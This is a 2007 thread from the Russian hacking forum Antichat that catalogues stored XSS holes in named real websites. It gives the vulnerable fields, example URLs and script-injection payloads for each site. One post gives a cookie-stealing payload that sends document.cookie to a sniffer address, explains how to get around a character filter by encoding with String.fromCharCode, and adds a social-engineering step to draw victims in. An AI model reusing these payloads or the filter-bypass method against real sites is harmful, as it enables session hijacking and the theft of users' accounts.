HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #61  
Старый 07.06.2007, 11:35
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами: 10227206

Репутация: 2163
По умолчанию

Хэк в индексе=) поле Адрес сайта
http://hackyou.ru/
описание тут
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
 
Ответить с цитированием

www.web-hack.ru
  #62  
Старый 12.06.2007, 23:47
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами: 10313606

Репутация: 1327
По умолчанию www.web-hack.ru

www.web-hack.ru --> добавить новость

Вбиваем все данные на фонарь кроме кода, его вводим правильно. В саму новость(textarea) пишем:
Код:
<script>alert(document.cookie)</script>
и жмем кнопочку добавить (Аdd)

ps Как выяснилось, она является активной.
 
Ответить с цитированием

  #63  
Старый 13.06.2007, 04:12
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,315
С нами: 10248806

Репутация: 2371


По умолчанию

www.wikiupload.com
Заливаем любой файл...в описание пишем
Код:
'"><script>alert(/xss/)</script>
Кнопочку "upload" жмем...
Выдается 2 ссылки, одна на скачку, другая на комментарии файла..
Идем в каменты и видим хсс
Пример
Код:
http://www.wikiupload.com/comment.php?id=158669
 
Ответить с цитированием

  #64  
Старый 13.06.2007, 19:58
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
Wink

chatcity.ru

Ну вообщем то........вроде чаты на chatcity


Поля:
E-mail
web-страничка

Вот один пример на volchat.ru
Код:
http://volchat.ru/people/pp0.cgi?c=13397&cn=trane___
 
Ответить с цитированием

  #65  
Старый 14.06.2007, 13:55
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию

narod.yandex.ru

Пишем письмо в сообщество, уязвимо поле "Ваш сайт:"

<script>alert('123');</script>

Последний раз редактировалось freddi; 16.06.2007 в 23:29..
 
Ответить с цитированием

  #66  
Старый 16.06.2007, 23:26
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию

nm.ru

прикрепляем к письму файл txt или pdf со скриптом.
 
Ответить с цитированием

  #67  
Старый 17.06.2007, 17:45
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию

www.xyligan.ru

уязвимо поле "имя"))))

зы это из компании Хакера
ззы пассивных там полно.
 
Ответить с цитированием

  #68  
Старый 17.06.2007, 21:34
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
С нами: 10447337

Репутация: 807
По умолчанию

www.xakep.ru

хсс в чате

уязвимо любое поле, но только одно, там нет ограничения на кол-во символов, но стоит фильтрация символов:
" ? +
это можно спокойно обойти через String.fromCharCode()
сам код идет в виде

"onmouseover="navigate('адрес_снифера' .concat(document.cookie))"
или просто
"onmouseover="alert('xss')"

кодируем
navigate('адрес_снифера'.concat(docume nt.cookie))
с помощью http://ha.ckers.org/xss.html
получится примерно

Цитата:
&#x6E;&#x61;&#x76;&#x69;&#x67;&#x61;&#x74;&#x65 ;
и пишем в виде

"onmouseover="String.fromCharCode(то что закодировали)"

ну чтоб все заработало там ставится галка "Допустить других к просмотру профайла" и говорим посмотрите мой профиль вот так)

зы спс DimOnOID за небольшую помощь)

Последний раз редактировалось freddi; 19.06.2007 в 20:57..
 
Ответить с цитированием

  #69  
Старый 28.06.2007, 19:39
V.I.P
Познающий
Регистрация: 06.04.2007
Сообщений: 77
С нами: 10051477

Репутация: 136
Smile

www.panvasoft.com
Весьма популярный,посещаемый сайт.
потставляем "><script>alert()</script> во все поля в коментариях.

Пример:http://panvasoft.com/rus/11970/gb/


www.hpclub.ru
Добавление комментарий
"><script>alert()</script>

Пример:http://www.hpclub.ru/news.php3?cID=4

www.consultclub.biz

Добавление комментарий
"><script>alert()</script>[/B]

Последний раз редактировалось V.I.P; 28.06.2007 в 20:19..
 
Ответить с цитированием

  #70  
Старый 29.06.2007, 16:30
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
С нами: 10153766

Репутация: 2565
По умолчанию

www.lektravi.ru
Интернет магазин Лекарственные травы
Травки не желаете....=)
Активка в гостевой, при добавлении сообщения в поле почта пишем
Код:
'><script>alert("ShaDow");</script>
пример
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.